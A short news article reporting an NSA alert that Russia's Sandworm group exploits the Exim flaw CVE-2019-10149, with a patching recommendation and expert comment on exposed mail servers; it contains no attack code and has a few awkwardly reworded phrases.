Today, the US National Security Agency (NSA) has issued a security alert, warning that a new spell of cyberattacks against email servers, attacks launched by one of Russia’s cutting-edge cyber-spying units.
The agency says that a division of the Russian military intelligence service have been targeting email servers running the Exim mail transfer agent (MTA).
This group, known as “Sandworms”, has been hacking Exim servers since August 2019 by misusing a serious susceptibility tracked as CVE-2019-10149.
“When Sandworm exploited CVE-2019-10149, the victim machine would subsequently download and execute a shell script from a Sandworm-controlled domain,” the NSA says.
This shell script would add privileged users and disable network security settings; update SSH configurations to enable extra remote access; implement an additional script to enable follow-on exploitation, and more.
Private and government organizations are now being warned to update their Exim servers to version 4.93 and look for indicators of compromise.
Active since the mid-2000s, the Sandworm group is thought to be the hacker group that developed the BlackEnergy malware that caused a blackout in Ukraine in December 2015 and December.
The CVE-2019-10149 susceptibility was revealed in June 2019, and was codenamed “Return of the WIZard.”
Within a week after its disclosure, hacking groups started exploiting it. Two weeks later, Microsoft had also issued a warning at the time, informing Azure customers that a hacker had developed an Exim self-spreading worm that abused this flaw to capture servers running on Azure setup.
“Many orgs fixate on the new and shiny, like cloud and mobile. However, they forget that really old services like SMTP run a big chunk of their personal and business lives, and by definition those services are Internet-exposed,” Richard Bejtlich, Principal Security Strategist at cyber-security firm Corelight, said.
“They make perfect targets for adversaries as they face the Internet, they handle the most sensitive data, and people treat them like appliances, meaning they are often forgotten so long as they continue working, and are not monitored.”